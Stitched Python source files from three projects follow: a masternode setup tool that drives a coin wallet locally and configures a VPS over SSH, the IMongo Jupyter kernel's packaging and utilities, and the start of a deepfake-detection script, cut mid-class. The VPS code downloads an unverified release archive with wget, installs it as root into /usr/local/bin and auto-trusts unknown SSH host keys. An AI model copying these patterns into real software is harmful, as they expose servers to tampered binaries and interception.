        server (str): The IP address of the server to connect to.
        label (str): The label to be used when generating a new address.
        masternodeConfFile (str): The full path to the masternode conf file.
        masternodePort (int): The port number associated with the masternode.
        masternodeOutput (dict): The masternode output containing the collateral txinfo.
        masternodeKey (str): The masternode key associated with this node.
    """
    setupMasternodeConfFile(server, label, masternodeConfFile, masternodePort, masternodeOutput, masternodeKey)
    startMasternodeAlias(cli, label)
def getCoinBinaries(envHome, cliName, daemonName):
    """Gets the full paths of the binaries associated with this coin.

    Args:
        envHome (str): The name of the home environment variable.
        cliName (str): The name of the cli binary associated with this coin.
        daemonName (str): The name of the daemon binary associated with this coin.

    Returns:
        2-Tuple: (cli path, daemon path), both under <home>/daemon/.
    """
    daemonDir = os.path.join(environ.get(envHome), "daemon")
    return (os.path.join(daemonDir, cliName), os.path.join(daemonDir, daemonName))
def getCoinFiles(envUser, walletConf, masternodeConf):
    """Gets the full paths of the conf files associated with this coin.

    Args:
        envUser (str): The name of the user environment variable.
        walletConf (str): The name of the wallet conf file.
        masternodeConf (str): The name of the masternode conf file.

    Returns:
        2-Tuple: (wallet conf path, masternode conf path).
    """
    base = environ.get(envUser)
    return (os.path.join(base, walletConf), os.path.join(base, masternodeConf))
def checkPrerequisites(config):
    """Checks that certain prerequisites are met before continuing. Specifically:
    1. Check that necessary environment variables are defined.
    2. Check that the local wallet is installed.

    Args:
        config (configparser.ConfigParser): parsed application configuration.

    Raises:
        ValueError: if an environment variable is unset or a binary is missing.
    """
    print("Checking wallet requirements..")
    # Validate the environment variables BEFORE resolving binary paths: the
    # original resolved paths first, so an unset home variable crashed inside
    # os.path.join with a TypeError instead of the friendly ValueError.
    checkIfEnvironmentDefined(config["Environment"]["Home"], config["Environment"]["User"])
    cli, daemonCli = getCoinBinaries(config["Environment"]["Home"], config["Coin"]["Cli"], config["Coin"]["Daemon"])
    checkIfWalletInstalled(cli, daemonCli)
    print("")
def setup(server, user, password, label, config):
    """Top level function associated with this module. Responsible for the core configuration
    of this masternode. Specifically it will:
    1. Start local daemon.
    2. Poll for wallet to be synced.
    3. Perform masternode transactions.
    4. Setup masternode config on vps.
    5. Setup the local wallet for the masternode.
    6. Stop local daemon.

    Args:
        server (str): The IP address of the VPS.
        user (str): The SSH username for the VPS.
        password (str): The SSH password associated with the user.
        label (str): The alias to give the new masternode.
        config (configparser.ConfigParser): parsed application configuration.
    """
    # Determine binary and file names based on config
    cli, daemonCli = getCoinBinaries(config["Environment"]["Home"], config["Coin"]["Cli"], config["Coin"]["Daemon"])
    walletConfFile, masternodeConfFile = getCoinFiles(config["Environment"]["User"], config["Wallet"]["WalletConf"], config["Wallet"]["MasternodeConf"])
    setupWallet(walletConfFile)
    localDaemon = startLocalDaemon(daemonCli)
    try:
        pollForWalletSync(cli)
        masternodeOutput, masternodeKey = setupMasternodeTransaction(cli, label, float(config["Coin"]["Collateral"]))
        # Remote paths live under the coin user's home directory on the VPS.
        vpsConfFile = "/home/{0}/{1}/{2}".format(config["Coin"]["Name"], config["VPS"]["DataDir"], config["VPS"]["ConfFile"])
        vpsDebugFile = "/home/{0}/{1}/{2}".format(config["Coin"]["Name"], config["VPS"]["DataDir"], config["VPS"]["DebugFile"])
        setupVpsMasternode(config["Coin"]["Cli"], config["Coin"]["Daemon"], server, user, password, vpsConfFile, masternodeKey, config["Coin"]["Name"], vpsDebugFile)
        setupWalletForMasternode(cli, server, label, masternodeConfFile, int(config["Coin"]["Port"]), masternodeOutput, masternodeKey)
    finally:
        # Always stop the local daemon, even if setup failed mid-way.
        stopLocalDaemon(cli)
        localDaemon.wait()
|
mtmonte/MasternodeSetup | MasternodeSetup/vps.py | #!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Cosmos Coin Developers, https://cosmoscoin.co/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import time
import json
import paramiko
from io import BytesIO
from urllib.request import urlopen
DEFAULT_DECODE = "utf-8"
CHECK_RELEASE_COMMAND = "lsb_release -a"
UPDATE_TOOLS_COMMAND = "apt-get -y update && apt-get -y upgrade && apt-get -y install wget"
INSTALL_COIN_COMMAND = "mkdir -p /home/{0} && " \
"wget -qO- {1} | tar xvz --strip-components=1 -C /home/{0} && " \
"cp /home/{0}/bin/* /usr/local/bin"
GET_LATEST_GIT_RELEASE_COMMAND = "https://api.github.com/repos/{0}/{1}/releases/latest"
IS_COIN_INSTALLED_COMMAND = "command -v {0}"
CHECK_IF_PROCESS_RUNNING_COMMAND_FMT = "ps cax | grep {0} > /dev/null"
def openChannel(server, username, password):
    """Open an SSH channel with the specified server.

    Args:
        server (str): The IP address of the server to connect to.
        username (str): The username to be used in the connection.
        password (str): The password associated with the user.

    Returns:
        Obj: A client object containing the state of the connection.
    """
    channel = paramiko.SSHClient()
    # Pass an instance rather than the class: older paramiko releases require
    # an instantiated MissingHostKeyPolicy (newer ones accept either form).
    # NOTE(review): AutoAddPolicy blindly trusts unknown host keys (MITM
    # exposure); acceptable for this tool, but worth confirming.
    channel.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    channel.connect(server, username=username, password=password)
    return channel
def closeChannel(channel):
    """Close a previously open SSH connection.

    Args:
        channel (obj): The client object returned by the open function.
    """
    channel.close()
def sendCommand(channel, command):
    """Send a command across the channel and return the results.

    Args:
        channel (obj): The client object returned by the open function.
        command (str): The command to be executed.

    Returns:
        Str: A string object containing the command results (stdout followed
        by any stderr output, interleaved into one buffer).

    Raises:
        ValueError: if the remote command exits with a non-zero status.
    """
    output = BytesIO()
    stdin, stdout, stderr = channel.exec_command(command)
    # Drain partial output while the command is still running, so a
    # long-running command cannot fill the channel buffer and stall.
    while not stdout.channel.exit_status_ready():
        while stdout.channel.recv_ready():
            output.write(stdout.channel.recv(1024))
        time.sleep(2)
    # Parse any remaining channel output after the command exited.
    while stdout.channel.recv_ready():
        output.write(stdout.channel.recv(1024))
    # Parse any error channel output.
    while stderr.channel.recv_ready():
        output.write(stderr.channel.recv(1024))
    exitStatus = stdout.channel.recv_exit_status()
    if exitStatus != 0:
        raise ValueError("Command: \"{0}\" failed with status: {1}".format(command, exitStatus))
    return output.getvalue().decode(DEFAULT_DECODE)
def createFileWithContents(server, username, password, filePath, data):
    """Create a file on the specified server with the contents provided.
    Args:
        server (str): The IP address of the server to connect to.
        username (str): The username to be used in the connection.
        password (str): The password associated with the user.
        filePath (str): The relative path of the file to be written (relative to $HOME)
        data (str): The data to be written into the file.
    """
    directory = os.path.dirname(filePath)
    # Open SSH connection
    channel = openChannel(server, username, password)
    # BUG FIX: the original only protected the file write with try/finally,
    # so the SSH channel leaked if open_sftp() or mkdir raised anything
    # other than IOError. Wrap everything after the connect.
    try:
        sftp = channel.open_sftp()
        # Create directory if necessary; an already-existing directory
        # raises IOError, which is deliberately ignored (best effort).
        try:
            sftp.mkdir(directory)
        except IOError:
            pass
        # Transfer and replace the file contents
        with sftp.open(filePath, 'w') as f:
            f.write(data)
    finally:
        # Close ssh connection
        closeChannel(channel)
def checkRelease(channel, codeName):
    """Check and verify the release on the VPS server.
    Args:
        channel (obj): The client object returned by the open function.
        codeName (str): The expected release code name to verify.
    Raises:
        ValueError: If the reported release does not contain *codeName*.
    """
    print("Checking VPS operating system release..\n")
    release_info = sendCommand(channel, CHECK_RELEASE_COMMAND)
    print(release_info)
    if codeName not in release_info:
        raise ValueError("Unsupported operating system, refer to documentation for more info")
def checkDaemonNotRunning(channel, daemonName):
    """Verify the daemon is not currently running on the VPS.
    Args:
        channel (obj): The client object returned by the open function.
        daemonName (str): The name of the daemon to check.
    Raises:
        ValueError: If the daemon process is currently running.
    """
    print("Checking that daemon is not currently running on VPS..")
    if isProcessRunning(channel, daemonName):
        raise ValueError(
            "The \'{0}\' daemon is currently running, please stop it and try again".format(daemonName))
    print("")
def updateTools(channel):
    """Update the installation and tools on the VPS.
    Note: The output won't be printed until the update is complete.
    Args:
        channel (obj): The client object returned by the open function.
    """
    print("Updating tools on VPS..\n")
    update_output = sendCommand(channel, UPDATE_TOOLS_COMMAND)
    print(update_output)
def getInstallCommand(coinName, gitOwner, gitProject, namePattern):
    """Determine the installation command based on the coin's latest release.
    Args:
        coinName (str): Name of the coin to install.
        gitOwner (str): The Git owner of the project.
        gitProject (str): The name of the project in Git.
        namePattern (str): A pattern to be used to identify the release version to get.
    Returns:
        String: A string containing the install command to be executed.
    Raises:
        ValueError: If the pattern does not match exactly one release asset.
    """
    print("Get the latest masternode release")
    url = GET_LATEST_GIT_RELEASE_COMMAND.format(gitOwner, gitProject)
    releases = json.load(urlopen(url))
    matches = [release for release in releases["assets"] if namePattern in release["name"]]
    if len(matches) != 1:
        # BUG FIX: the original referenced an undefined name (len(txValues)),
        # raising NameError instead of the intended ValueError.
        message = "Unexpected number of matches: {0} for the specified pattern {1}, please check configuration".format(len(matches), namePattern)
        raise ValueError(message)
    downloadUrl = matches[0]["browser_download_url"]
    print("Latest release found: {0}\n".format(downloadUrl))
    return INSTALL_COIN_COMMAND.format(coinName, downloadUrl)
def installMasternode(coinName, channel, daemonName, installCommand):
    """Install the masternode binaries on the VPS.
    Args:
        coinName (str): Name of the coin being installed.
        channel (obj): The client object returned by the open function.
        daemonName (str): The name of the daemon binary associated with the installation.
        installCommand (str): The full command to be executed for installation.
    """
    print("Installing masternode on VPS..")
    print("Install command:\n\n{0}\n".format(installCommand))
    try:
        # sendCommand raises ValueError when "command -v" exits non-zero,
        # i.e. when the binary is not yet installed.
        sendCommand(channel, IS_COIN_INSTALLED_COMMAND.format(daemonName))
    except ValueError:
        # Narrowed from a bare except: only a failed probe should trigger an
        # install; KeyboardInterrupt/SystemExit must still propagate.
        print(sendCommand(channel, installCommand))
    else:
        print("{0} is already installed.. skipping installation.\n".format(coinName))
def isProcessRunning(channel, processName):
    """Check if the specified process is currently running.
    Args:
        channel (obj): The client object returned by the open function.
        processName (str): The name of the process to check.
    Returns:
        Boolean: True if the process is running, False otherwise.
    """
    try:
        # sendCommand raises ValueError when the grep exits non-zero,
        # i.e. when no matching process exists.
        command = CHECK_IF_PROCESS_RUNNING_COMMAND_FMT.format(processName)
        sendCommand(channel, command)
    except ValueError:
        # Narrowed from a bare except so control-flow exceptions propagate.
        return False
    else:
        return True
def createUser(channel, coinName):
    """Creates a user for the coin if necessary.
    Args:
        channel (obj): The client object returned by the open function.
        coinName (str): Name of the coin.
    """
    print("Creating user for masternode: {0}, if necessary..".format(coinName))
    try:
        # sendCommand raises ValueError when "id -u" exits non-zero,
        # i.e. when the user does not exist yet.
        sendCommand(channel, "id -u {0}".format(coinName))
    except ValueError:
        # Narrowed from a bare except: only a missing user triggers creation.
        sendCommand(channel, "useradd {0}".format(coinName))
    print("")
def sendSingleCommand(server, user, password, command):
    """Wrapper function to open a connection and execute a single command.
    Args:
        server (str): The IP address of the server to connect to.
        user (str): The username to be used in the connection.
        password (str): The password associated with the user.
        command (str): The command to be executed.
    Returns:
        String: String containing the command output ("" if sendCommand raised).
    """
    # Open SSH connection
    channel = openChannel(server, user, password)
    output = ""
    try:
        output = sendCommand(channel, command)
    finally:
        # Close ssh connection
        closeChannel(channel)
    return output
def setup(server, user, password, config):
    """Program entry point. This function will setup the VPS per the coin requirements.
    Args:
        server (str): The IP address of the server to connect to.
        user (str): The username to be used in the connection.
        password (str): The password associated with the user.
        config (dict): Dictionary containing the options parsed by the utility
            (expects "VPS", "Coin" and "Git" sections).
    """
    # Open SSH connection
    channel = openChannel(server, user, password)
    try:
        # Check that OS is the right version
        checkRelease(channel, config["VPS"]["UbuntuCodename"])
        # Check that daemon is not running
        checkDaemonNotRunning(channel, config["Coin"]["Daemon"])
        # Update OS tools
        updateTools(channel)
        # Install masternode
        installCommand = getInstallCommand(config["Coin"]["Name"], config["Git"]["Owner"], config["Git"]["Project"], config["Git"]["NamePattern"])
        installMasternode(config["Coin"]["Name"], channel, config["Coin"]["Daemon"], installCommand)
        # Create user for masternode
        createUser(channel, config["Coin"]["Name"])
    finally:
        # Close ssh connection
        closeChannel(channel)
|
mtmonte/MasternodeSetup | MasternodeSetup/daemon.py | #!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Cosmos Coin Developers, https://cosmoscoin.co/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import subprocess
# Encoding used to decode all daemon/CLI output.
DEFAULT_DECODE = "utf-8"
# Seconds the wallet stays unlocked after a walletpassphrase call.
WALLET_LOCK_TIMEOUT_SEC = 60
# Command templates; {0} is the daemon/cli binary path, later slots are arguments.
DAEMON_STOP_COMMAND = "{0} stop"
DAEMON_START_COMMAND = "{0} -daemon"
CLI_GET_BALANCE = "{0} getbalance"
CLI_LIST_UNSPENT = "{0} listunspent"
CLI_GET_BLOCKCHAIN_INFO = "{0} getblockchaininfo"
CLI_UNLOCK_WALLET = "{0} walletpassphrase {1} {2}"
CLI_SEND_TO_ADDRESS = "{0} sendtoaddress {1} {2}"
CLI_GENERATE_NEW_ADDRESS = "{0} getnewaddress {1}"
CLI_MASTERNODE_GENKEY = "{0} masternode genkey"
CLI_MASTERNODE_OUTPUTS = "{0} masternode outputs"
CLI_MASTERNODE_START_ALIAS = "{0} masternode start-alias {1}"
def start(daemon):
    """Start the coin daemon as a background process.
    Args:
        daemon (str): Full path to daemon binary associated with coin.
    Returns:
        Popen: The subprocess handle of the launched daemon (note: unlike the
        other wrappers in this module this returns the process object, not its
        decoded output).
    """
    command = DAEMON_START_COMMAND.format(daemon).split(" ")
    return subprocess.Popen(command, stdout=subprocess.PIPE)
def stop(cli):
    """Wrapper function for the relevant RPC function call.
    Args:
        cli (str): Full path to cli binary associated with coin.
    Returns:
        String: String containing the command output.
    """
    # Split into an argument list (as start() does): passing the whole string
    # to check_output without shell=True fails on POSIX.
    command = DAEMON_STOP_COMMAND.format(cli).split(" ")
    return subprocess.check_output(command).decode(DEFAULT_DECODE)
def getBlockchainInfo(cli):
    """Wrapper function for the relevant RPC function call.
    Args:
        cli (str): Full path to cli binary associated with coin.
    Returns:
        String: String containing the command output.
    """
    # Argument list instead of a bare string: required for POSIX check_output.
    command = CLI_GET_BLOCKCHAIN_INFO.format(cli).split(" ")
    return subprocess.check_output(command).decode(DEFAULT_DECODE)
def generateNewAddress(cli, label):
    """Wrapper function for the relevant RPC function call.
    Args:
        cli (str): Full path to cli binary associated with coin.
        label (str): Label associated with the address to be generated.
    Returns:
        String: String containing the command output.
    """
    # Argument list instead of a bare string: required for POSIX check_output.
    command = CLI_GENERATE_NEW_ADDRESS.format(cli, label).split(" ")
    return subprocess.check_output(command).decode(DEFAULT_DECODE).strip()
def unlockWallet(cli, passphrase):
    """Wrapper function for the relevant RPC function call.
    Args:
        cli (str): Full path to cli binary associated with coin.
        passphrase (str): Passphrase to be used in wallet unlock.
    Returns:
        String: String containing the command output.
    """
    # Argument list instead of a bare string: required for POSIX check_output.
    # NOTE(review): a passphrase containing spaces is split into multiple
    # arguments here — confirm passphrases are single tokens.
    command = CLI_UNLOCK_WALLET.format(cli, passphrase, WALLET_LOCK_TIMEOUT_SEC).split(" ")
    return subprocess.check_output(command, stderr=subprocess.STDOUT).decode(DEFAULT_DECODE)
def sendToAddress(cli, address, amount):
    """Wrapper function for the relevant RPC function call.
    Args:
        cli (str): Full path to cli binary associated with coin.
        address (str): Address to be used for sending.
        amount (int): Amount of coins to be sent.
    Returns:
        String: String containing the command output.
    """
    # Argument list instead of a bare string: required for POSIX check_output.
    command = CLI_SEND_TO_ADDRESS.format(cli, address, amount).split(" ")
    return subprocess.check_output(command, stderr=subprocess.STDOUT).decode(DEFAULT_DECODE).strip()
def getTotalBalance(cli):
    """Wrapper function for the relevant RPC function call.
    Args:
        cli (str): Full path to cli binary associated with coin.
    Returns:
        String: String containing the command output.
    """
    # Argument list instead of a bare string: required for POSIX check_output.
    command = CLI_GET_BALANCE.format(cli).split(" ")
    return subprocess.check_output(command).decode(DEFAULT_DECODE)
def listUnspent(cli):
    """Wrapper function for the relevant RPC function call.
    Args:
        cli (str): Full path to cli binary associated with coin.
    Returns:
        String: String containing the command output.
    """
    # Argument list instead of a bare string: required for POSIX check_output.
    command = CLI_LIST_UNSPENT.format(cli).split(" ")
    return subprocess.check_output(command).decode(DEFAULT_DECODE)
def getMasternodeOutputs(cli):
    """Wrapper function for the relevant RPC function call.
    Args:
        cli (str): Full path to cli binary associated with coin.
    Returns:
        String: String containing the command output.
    """
    # Argument list instead of a bare string: required for POSIX check_output.
    command = CLI_MASTERNODE_OUTPUTS.format(cli).split(" ")
    return subprocess.check_output(command).decode(DEFAULT_DECODE)
def generateMasternodeKey(cli):
    """Wrapper function for the relevant RPC function call.
    Args:
        cli (str): Full path to cli binary associated with coin.
    Returns:
        String: String containing the command output.
    """
    # Argument list instead of a bare string: required for POSIX check_output.
    command = CLI_MASTERNODE_GENKEY.format(cli).split(" ")
    return subprocess.check_output(command).decode(DEFAULT_DECODE).strip()
def masternodeStartAlias(cli, alias):
    """Wrapper function for the relevant RPC function call.
    Args:
        cli (str): Full path to cli binary associated with coin.
        alias (str): Alias associated with masternode to be started.
    Returns:
        String: String containing the command output.
    """
    # Argument list instead of a bare string: required for POSIX check_output.
    command = CLI_MASTERNODE_START_ALIAS.format(cli, alias).split(" ")
    return subprocess.check_output(command).decode(DEFAULT_DECODE).strip()
|
Abhi-1U/imongo | imongo/__init__.py | """A MongoDB kernel for Jupyter"""
# Package version string.
__version__ = '0.1.0'
|
Abhi-1U/imongo | setup.py | <filename>setup.py<gh_stars>10-100
#!/usr/bin/env python
import json
import os
import sys
from setuptools import setup
from setuptools.command.install import install
# Abort installation on unsupported interpreters (requires Python 3.6+).
if sys.version_info.major != 3 or sys.version_info.minor < 6:
    sys.exit('IMongo supports Python 3.6+ only')
class Installer(install):
    """setuptools ``install`` command that also registers the Jupyter kernelspec."""
    def run(self):
        # Perform the standard package installation first.
        install.run(self)
        # Then register the IMongo kernel spec with Jupyter.
        print('Installing Jupyter kernelspec')
        from jupyter_client.kernelspec import KernelSpecManager
        from IPython.utils.tempdir import TemporaryDirectory
        kernel_json = {
            "argv": ["python", "-m", "imongo", "-f", "{connection_file}"],
            "codemirror_mode": "shell",
            "display_name": "IMongo"
        }
        with TemporaryDirectory() as staging_dir:
            # Kernelspec directories must be readable by Jupyter.
            os.chmod(staging_dir, 0o755)
            spec_path = os.path.join(staging_dir, 'kernel.json')
            with open(spec_path, 'w') as spec_file:
                json.dump(kernel_json, spec_file, sort_keys=True)
            manager = KernelSpecManager()
            manager.install_kernel_spec(staging_dir, 'imongo', user=self.user, replace=True, prefix=self.prefix)
# Long description for PyPI, taken from the README.
with open('README.rst', 'r') as f:
    long_description = f.read()
# Distribution metadata; the custom Installer registers the Jupyter
# kernelspec as a post-install step.
setup(name='imongo-kernel',
      version='0.1.0',
      description='A MongoDB kernel for Jupyter',
      long_description=long_description,
      author='<NAME>',
      author_email='<EMAIL>',
      url='https://github.com/gusutabopb/imongo',
      packages=['imongo'],
      cmdclass={'install': Installer},
      license='MIT',
      include_package_data=True,
      install_requires=['jupyter>=1.0.0',
                        'ipykernel',
                        'pexpect>=4.2.1',
                        'pyyaml'],
      classifiers=[
          'Intended Audience :: Developers',
          'Intended Audience :: System Administrators',
          'Intended Audience :: Science/Research',
          'Development Status :: 3 - Alpha',
          'Programming Language :: Python :: 3.6',
          'Topic :: System :: Shells',
      ])
|
Abhi-1U/imongo | imongo/utils.py | <reponame>Abhi-1U/imongo
import logging
from functools import wraps
from tornado.log import LogFormatter as ColoredFormatter
import os
# Module-level logger used by the exception_logger decorator below.
logger = logging.getLogger('IMongo')
def make_logger(name, fname=None) -> logging.Logger:
    """Build a logger with a colored INFO stream handler and optional DEBUG file handler.
    Args:
        name (str): Logger name.
        fname (str, optional): Log file path; parent directories are created
            when missing. When None, no file handler is attached (the
            original crashed on a None filename).
    Returns:
        logging.Logger: The configured logger.
    """
    logger = logging.getLogger(name)
    logger.setLevel(logging.DEBUG)
    FORMAT = '%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s'
    stream_formatter = ColoredFormatter(fmt=FORMAT, datefmt='%H:%M:%S')
    stream_handler = logging.StreamHandler()
    stream_handler.setFormatter(stream_formatter)
    stream_handler.setLevel(logging.INFO)
    logger.addHandler(stream_handler)
    if fname:
        # Create the log directory up front instead of catching the
        # FileNotFoundError and duplicating the handler setup.
        directory = os.path.dirname(fname)
        if directory:
            os.makedirs(directory, exist_ok=True)
        file_formatter = logging.Formatter('%(asctime)s | %(name)s | %(levelname)s: %(message)s')
        file_handler = logging.FileHandler(filename=fname, mode='a')
        file_handler.setFormatter(file_formatter)
        file_handler.setLevel(logging.DEBUG)
        logger.addHandler(file_handler)
    return logger
def exception_logger(func):
    """Decorator: run *func*, log any exception at DEBUG level and return None instead."""
    @wraps(func)
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception as exc:
            details = func.__module__, func.__name__, exc.__class__.__name__, exc.args
            logger.debug('{}.{} failed | {}: {}'.format(*details))
            return None
    return wrapper
|
Abhi-1U/imongo | imongo/__main__.py | <filename>imongo/__main__.py
# Entry point for ``python -m imongo``: start the MongoDB kernel.
from ipykernel.kernelapp import IPKernelApp
from .kernel import MongoKernel
IPKernelApp.launch_instance(kernel_class=MongoKernel)
|
kenil-shah/DeepFake_Detection | main.py | import colorsys
import cv2
import numpy as np
from keras import backend as K
from keras.preprocessing.image import ImageDataGenerator
from keras.preprocessing import image
from keras.models import load_model,Model, Sequential
from keras.layers import Input, Dropout, Flatten, Dense,Conv2D, MaxPool2D, GlobalMaxPooling2D,Activation,GlobalAveragePooling2D
from keras.layers import BatchNormalization,multiply,Lambda
from keras import optimizers
from PIL import Image
from yolo3.model import yolo_eval, yolo_body, tiny_yolo_body
from yolo3.utils import letterbox_image
import os
from keras.utils import multi_gpu_model
import time
from numba import cuda
from os import listdir
from os.path import isfile, join
import torch
import torch.nn as nn
import torchvision.models as models
from torchvision.transforms import Normalize
from sklearn import metrics
from efficientnet.keras import EfficientNetB5, EfficientNetB6
from keras.applications.xception import Xception, preprocess_input
import json
# Torch device for ResNeXt inference: first CUDA device when available, else CPU.
gpu = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class MyResNeXt(models.resnet.ResNet):
    """ResNeXt50-32x4d backbone with a single-logit head for real/fake classification."""
    def __init__(self, training=True):
        # NOTE(review): `training` is never used in this constructor — confirm intent.
        # Bottleneck blocks with layers [3, 4, 6, 3], 32 groups, width 4
        # matches the resnext50_32x4d configuration.
        super(MyResNeXt, self).__init__(block=models.resnet.Bottleneck,
                                        layers=[3, 4, 6, 3],
                                        groups=32,
                                        width_per_group=4)
        # Replace the ImageNet classifier with a single output unit.
        self.fc = nn.Linear(2048, 1)
class YOLO(object):
    """Keras YOLOv3 wrapper used here to find (padded) person bounding boxes in frames."""
    # Default configuration; load_models() copies these into the instance and
    # lets keyword arguments override them.
    _defaults = {
        "model_path": 'model_data/yolo.h5',
        "anchors_path": 'model_data/yolo_anchors.txt',
        "classes_path": 'model_data/coco_classes.txt',
        "score" : 0.3,
        "iou" : 0.45,
        "model_image_size" : (416, 416),
        "gpu_num" : 1,
    }
    @classmethod
    def get_defaults(cls, n):
        """Return the default for option *n*, or an error string when unknown."""
        if n in cls._defaults:
            return cls._defaults[n]
        else:
            return "Unrecognized attribute name '" + n + "'"
    def load_models(self, **kwargs):
        """Load model/anchors/classes and build the inference graph; kwargs override _defaults."""
        self.__dict__.update(self._defaults)
        self.__dict__.update(kwargs)
        self.class_names = self._get_class()
        self.anchors = self._get_anchors()
        self.sess = K.get_session()
        self.boxes, self.scores, self.classes = self.generate()
    def _get_class(self):
        """Read class names from the classes file (one name per line)."""
        classes_path = os.path.expanduser(self.classes_path)
        with open(classes_path) as f:
            class_names = f.readlines()
        class_names = [c.strip() for c in class_names]
        return class_names
    def _get_anchors(self):
        """Read comma-separated anchor values and reshape to (N, 2)."""
        anchors_path = os.path.expanduser(self.anchors_path)
        with open(anchors_path) as f:
            anchors = f.readline()
        anchors = [float(x) for x in anchors.split(',')]
        return np.array(anchors).reshape(-1, 2)
    def generate(self):
        """Load or rebuild the YOLO model and return box/score/class output tensors."""
        model_path = os.path.expanduser(self.model_path)
        assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'
        # Load model, or construct model and load weights.
        num_anchors = len(self.anchors)
        num_classes = len(self.class_names)
        is_tiny_version = num_anchors==6 # default setting
        try:
            self.yolo_model = load_model(model_path, compile=False)
        except:
            # Fall back to building the architecture and loading weights only.
            self.yolo_model = tiny_yolo_body(Input(shape=(None,None,3)), num_anchors//2, num_classes) \
                if is_tiny_version else yolo_body(Input(shape=(None,None,3)), num_anchors//3, num_classes)
            self.yolo_model.load_weights(self.model_path) # make sure model, anchors and classes match
        else:
            assert self.yolo_model.layers[-1].output_shape[-1] == \
                num_anchors/len(self.yolo_model.output) * (num_classes + 5), \
                'Mismatch between model and given anchor and class sizes'
        # One distinct HSV-derived RGB color per class (for drawing).
        hsv_tuples = [(x / len(self.class_names), 1., 1.)
                      for x in range(len(self.class_names))]
        self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
        self.colors = list(
            map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
                self.colors))
        np.random.seed(10101)  # Fixed seed for consistent colors across runs.
        np.random.shuffle(self.colors)  # Shuffle colors to decorrelate adjacent classes.
        np.random.seed(None)  # Reset seed to default.
        # Generate output tensor targets for filtered bounding boxes.
        self.input_image_shape = K.placeholder(shape=(2, ))
        if self.gpu_num>=2:
            self.yolo_model = multi_gpu_model(self.yolo_model, gpus=self.gpu_num)
        boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,
                                           len(self.class_names), self.input_image_shape,
                                           score_threshold=self.score, iou_threshold=self.iou)
        return boxes, scores, classes
    def detect_image(self, image):
        """Run detection on a PIL image.
        Returns:
            tuple: (image, person_boxes) where each box is
            [top, bottom, left, right] expanded by 10% per side and clamped
            to the image bounds.
        """
        if self.model_image_size != (None, None):
            assert self.model_image_size[0] % 32 == 0, 'Multiples of 32 required'
            assert self.model_image_size[1] % 32 == 0, 'Multiples of 32 required'
            boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))
        else:
            new_image_size = (image.width - (image.width % 32),
                              image.height - (image.height % 32))
            boxed_image = letterbox_image(image, new_image_size)
        image_data = np.array(boxed_image, dtype='float32')
        image_data /= 255.
        image_data = np.expand_dims(image_data, 0)  # Add batch dimension.
        out_boxes, out_scores, out_classes = self.sess.run(
            [self.boxes, self.scores, self.classes],
            feed_dict={
                self.yolo_model.input: image_data,
                self.input_image_shape: [image.size[1], image.size[0]],
                K.learning_phase(): 0
            })
        person_boxes = []
        # NOTE(review): boxes are collected for *every* detected class — the
        # class index `c` is never compared against "person"; confirm intent.
        for i, c in reversed(list(enumerate(out_classes))):
            box = out_boxes[i]
            top, left, bottom, right = box
            top = max(0, np.floor(top + 0.5).astype('int32'))
            left = max(0, np.floor(left + 0.5).astype('int32'))
            bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))
            right = min(image.size[0], np.floor(right + 0.5).astype('int32'))
            # Expand the box by 10% on each side, then clamp to the image.
            height = bottom-top
            width = right-left
            top = top - int(height*0.1)
            bottom = bottom + int(height*0.1)
            left = left - int(width*0.1)
            right = right + int(width*0.1)
            top = max(0, top)
            left = max(0, left)
            right = min(image.size[0],right)
            bottom = min(image.size[1],bottom)
            coordinates= [top,bottom, left, right]
            person_boxes += [coordinates]
        return image, person_boxes
    def close_session(self):
        """Release the underlying TensorFlow session."""
        self.sess.close()
    def detect_video(self,frame):
        """Detect boxes on a single ndarray frame; returns only the box list."""
        image = Image.fromarray(frame)
        image, person_boxes = self.detect_image(image)
        return person_boxes
class GenerateFaceCrops:
